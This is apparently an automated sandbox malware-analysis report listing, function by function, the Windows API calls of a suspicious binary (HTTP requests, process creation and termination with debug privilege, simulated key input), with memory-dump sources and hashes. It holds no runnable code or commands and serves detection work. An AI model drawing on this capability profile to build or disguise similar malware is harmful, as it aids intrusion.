                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F4CDFB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: 31f02c48bce5b6871494b33dc802b450c79a959c7aff4693584a478804c4c93d
                                                              • Instruction ID: 2d82ef0266eb28f21627d503e16c0edd8f7eb1068d0dd51e5c079729db0f5407
                                                              • Opcode Fuzzy Hash: 31f02c48bce5b6871494b33dc802b450c79a959c7aff4693584a478804c4c93d
                                                              • Instruction Fuzzy Hash: 6771A031901209DFCF618F64CC84AEA7FB5FF48320F14527AED559A2A6D7318891FBA0
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F81A50
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F81A7C
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F81ABE
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F81AD3
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F81AE0
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F81B10
                                                              • InternetCloseHandle.WININET(00000000), ref: 00F81B57
                                                                • Part of subcall function 00F82483: GetLastError.KERNEL32(?,?,00F81817,00000000,00000000,00000001), ref: 00F82498
                                                                • Part of subcall function 00F82483: SetEvent.KERNEL32(?,?,00F81817,00000000,00000000,00000001), ref: 00F824AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 2603140658-3916222277
                                                              • Opcode ID: 5a3a848fd27d4d8d8b6080c2299c0144bb2fa0c9aede1343cd1c2ef356889dbf
                                                              • Instruction ID: e261d0bd70b19bbc0a3d69ecabc07feb405d9527423666a2c2dab71f13b49233
                                                              • Opcode Fuzzy Hash: 5a3a848fd27d4d8d8b6080c2299c0144bb2fa0c9aede1343cd1c2ef356889dbf
                                                              • Instruction Fuzzy Hash: 394192B1901209BFEB15AF50CC85FFB7BACFF08350F004226FA059A141E7749E55ABA1
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F9F910), ref: 00F88D28
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F9F910), ref: 00F88D5C
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F88ED6
                                                              • SysFreeString.OLEAUT32(?), ref: 00F88F00
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: 1b249896408f3497288323c3b6fa8a75d640780ecd550629c8923b7fd2bbb65c
                                                              • Instruction ID: 3288415aba6015b13baa82bdda77ad0dae706a163a2a08874b24e395ff5a3284
                                                              • Opcode Fuzzy Hash: 1b249896408f3497288323c3b6fa8a75d640780ecd550629c8923b7fd2bbb65c
                                                              • Instruction Fuzzy Hash: CFF11871A00109AFCF14EFA4C884EEEB7B9BF45354F148458F905AB251DB71AE46EB90
                                                              APIs
                                                              • _memset.LIBCMT ref: 00F8F6B5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8F848
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F8F86C
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8F8AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F8F8CE
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F8FA4A
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F8FA7C
                                                              • CloseHandle.KERNEL32(?), ref: 00F8FAAB
                                                              • CloseHandle.KERNEL32(?), ref: 00F8FB22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: e6ffd4aefe79e0a57d9e4269cd4942989375aafc7423b30ca4b8d0f71a2dfde4
                                                              • Instruction ID: 9d0eb504ee4c6fda431827ebf64609bec0a8663403172e2883d2864b6e042960
                                                              • Opcode Fuzzy Hash: e6ffd4aefe79e0a57d9e4269cd4942989375aafc7423b30ca4b8d0f71a2dfde4
                                                              • Instruction Fuzzy Hash: 0EE1C2316043019FDB14EF24C891BAEBBE0EF85324F14856DF8898B2A1CB35DD49EB52
                                                              APIs
                                                                • Part of subcall function 00F7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F73697,?), ref: 00F7468B
                                                                • Part of subcall function 00F7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F73697,?), ref: 00F746A4
                                                                • Part of subcall function 00F74A31: GetFileAttributesW.KERNEL32(?,00F7370B), ref: 00F74A32
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00F74D40
                                                              • _wcscmp.LIBCMT ref: 00F74D5A
                                                              • MoveFileW.KERNEL32(?,?), ref: 00F74D75
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: 17efc1798839f637c0417af26f4d24c438d74198be2eca45c90805b682e336bf
                                                              • Instruction ID: 45cb3e2b8f681862286a232c69d8ea486ebc78f5de1bd3f137f1ebb2987cb90b
                                                              • Opcode Fuzzy Hash: 17efc1798839f637c0417af26f4d24c438d74198be2eca45c90805b682e336bf
                                                              • Instruction Fuzzy Hash: 70513EB24083459BC664EB60DC819DFB3ECAF84350F40492FB689D3151EF75A688D766
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F986FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 2eaea25ef10bfb575972462dd2a2150c7a3448718c0b886cdc0ab8a8882a7a24
                                                              • Instruction ID: fe3e4390602ed8fe2f07cfe1f81dc6f1b054c046d3877c2f3ea1a50046045686
                                                              • Opcode Fuzzy Hash: 2eaea25ef10bfb575972462dd2a2150c7a3448718c0b886cdc0ab8a8882a7a24
                                                              • Instruction Fuzzy Hash: 0551B331900248BEFF209B68CC85FAD3B65EB067A0F600116F911EA1E1CF75AD92FB51
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F4C2F7
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F4C319
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F4C331
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F4C34F
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F4C370
                                                              • DestroyIcon.USER32(00000000), ref: 00F4C37F
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F4C39C
                                                              • DestroyIcon.USER32(?), ref: 00F4C3AB
                                                                • Part of subcall function 00F9A4AF: DeleteObject.GDI32(00000000), ref: 00F9A4E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                              • String ID:
                                                              • API String ID: 2819616528-0
                                                              • Opcode ID: 2ea2d6616ba5ec4ea49657930bce549e2bd6dca4b2bcf69c90d44b57cb31bb10
                                                              • Instruction ID: 6db3762d3e084c3e4870857cdd7532214f8ce24c9f9abdc04baa2f06ae46ab7e
                                                              • Opcode Fuzzy Hash: 2ea2d6616ba5ec4ea49657930bce549e2bd6dca4b2bcf69c90d44b57cb31bb10
                                                              • Instruction Fuzzy Hash: 01515C75A01209EFDB64DFA4CC45FAA7BB5EB54720F104529F902D7290D7B0ADA0FBA0
                                                              APIs
                                                                • Part of subcall function 00F6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6A84C
                                                                • Part of subcall function 00F6A82C: GetCurrentThreadId.KERNEL32 ref: 00F6A853
                                                                • Part of subcall function 00F6A82C: AttachThreadInput.USER32(00000000,?,00F69683,?,00000001), ref: 00F6A85A
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F6968E
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F696AB
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F696AE
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F696B7
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F696D5
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F696D8
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F696E1
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F696F8
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F696FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: 67c236e53815380aa68055988307f52df397c5125cbd171aca37c4f34f9561ad
                                                              • Instruction ID: a4cb374d0f32c9a91515530e573a6c0afbd4cdcc48caaf0fcfaea82f57150d67
                                                              • Opcode Fuzzy Hash: 67c236e53815380aa68055988307f52df397c5125cbd171aca37c4f34f9561ad
                                                              • Instruction Fuzzy Hash: 23118EB1950618BEF6106B70DC89F6A7A2DEB4C751F110426F244AB0A1C9F26C50AAE4
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F6853C,00000B00,?,?), ref: 00F6892A
                                                              • HeapAlloc.KERNEL32(00000000,?,00F6853C,00000B00,?,?), ref: 00F68931
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F6853C,00000B00,?,?), ref: 00F68946
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00F6853C,00000B00,?,?), ref: 00F6894E
                                                              • DuplicateHandle.KERNEL32(00000000,?,00F6853C,00000B00,?,?), ref: 00F68951
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F6853C,00000B00,?,?), ref: 00F68961
                                                              • GetCurrentProcess.KERNEL32(00F6853C,00000000,?,00F6853C,00000B00,?,?), ref: 00F68969
                                                              • DuplicateHandle.KERNEL32(00000000,?,00F6853C,00000B00,?,?), ref: 00F6896C
                                                              • CreateThread.KERNEL32(00000000,00000000,00F68992,00000000,00000000,00000000), ref: 00F68986
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 094ec1b0294f7973f7ce0cfb817bf9be61d3b261577d2d1673a6e9869e77b84f
                                                              • Instruction ID: 4424444e867f25458649c418544de6b051c3590bc322d4ebc8a5c1dd2e7983b4
                                                              • Opcode Fuzzy Hash: 094ec1b0294f7973f7ce0cfb817bf9be61d3b261577d2d1673a6e9869e77b84f
                                                              • Instruction Fuzzy Hash: DD01BBB5640348FFEB10ABA5DC4DF6B3BACEB89711F508422FA05DB1A1CA709844DB65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 449088b252529bdf4495c321b84e887428196c6b9c1c83936c298acab1126c84
                                                              • Instruction ID: 837ef50075faffc4fd94afc30826b60631a06807c7b7799c6e3de93cfcffce80
                                                              • Opcode Fuzzy Hash: 449088b252529bdf4495c321b84e887428196c6b9c1c83936c298acab1126c84
                                                              • Instruction Fuzzy Hash: CFC19171E0421A9BDF10EF98D884BFEB7F5BB48314F188469E905A7280E7B19D45DBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearInit$_memset
                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                              • API String ID: 2862541840-625585964
                                                              • Opcode ID: 94aa62dbc142df6690b372d1a252a81729668a7d081b07806030228af97b4f25
                                                              • Instruction ID: bc9330de8585809d59824ca6fe1f41da8fcd52bde52d6f4d340ae7190d0962d0
                                                              • Opcode Fuzzy Hash: 94aa62dbc142df6690b372d1a252a81729668a7d081b07806030228af97b4f25
                                                              • Instruction Fuzzy Hash: D191A071E04209ABDF24EFA5CC49FEEB7B8EF45720F148119F505AB280D7B09945DBA0
                                                              APIs
                                                                • Part of subcall function 00F6710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?,?,00F67455), ref: 00F67127
                                                                • Part of subcall function 00F6710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?), ref: 00F67142
                                                                • Part of subcall function 00F6710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?,?), ref: 00F67150
                                                                • Part of subcall function 00F6710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F67044,80070057,?), ref: 00F67160
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F89806
                                                              • _memset.LIBCMT ref: 00F89813
                                                              • _memset.LIBCMT ref: 00F89956
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F89982
                                                              • CoTaskMemFree.OLE32(?), ref: 00F8998D
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 00F899DB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 1690af5fab7488fa895a25c7b83c7fef5c46dd69e71c9963b2e134b51cb71efd
                                                              • Instruction ID: c41c9751af5d9fb9e6493cfb8ed42e3361b766782bd4bce87a2f1c318023a45c
                                                              • Opcode Fuzzy Hash: 1690af5fab7488fa895a25c7b83c7fef5c46dd69e71c9963b2e134b51cb71efd
                                                              • Instruction Fuzzy Hash: 43914971D04219EBDF10EFA4DC84EEEBBB9AF08720F10415AF419A7281DB759A44DFA0
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F96E24
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F96E38
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F96E52
                                                              • _wcscat.LIBCMT ref: 00F96EAD
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F96EC4
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F96EF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: d751b8e962fe16796c34306f161d9c6ec86ad463749b49d8b09632ec54f56248
                                                              • Instruction ID: 251c013ce9bc3995bcc52e60429b6a589344a0c16b4afcb24363da9c6aef404f
                                                              • Opcode Fuzzy Hash: d751b8e962fe16796c34306f161d9c6ec86ad463749b49d8b09632ec54f56248
                                                              • Instruction Fuzzy Hash: 3D41B271A00309ABEF21DF64CC85BEE77E8EF08360F10042AF554E7291D6759D84EB64
                                                              APIs
                                                                • Part of subcall function 00F73C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F73C7A
                                                                • Part of subcall function 00F73C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F73C88
                                                                • Part of subcall function 00F73C55: CloseHandle.KERNEL32(00000000), ref: 00F73D52
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8E9A4
                                                              • GetLastError.KERNEL32 ref: 00F8E9B7
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F8E9E6
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F8EA63
                                                              • GetLastError.KERNEL32(00000000), ref: 00F8EA6E
                                                              • CloseHandle.KERNEL32(00000000), ref: 00F8EAA3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: 86a628946873434e1b03f319736acda2964961b16f2a1353f6d0817ba8e40105
                                                              • Instruction ID: 362f74ab228a9922b7ccb0e25f3f34d4c8104b2c95578c753e710056d2c2d9fc
                                                              • Opcode Fuzzy Hash: 86a628946873434e1b03f319736acda2964961b16f2a1353f6d0817ba8e40105
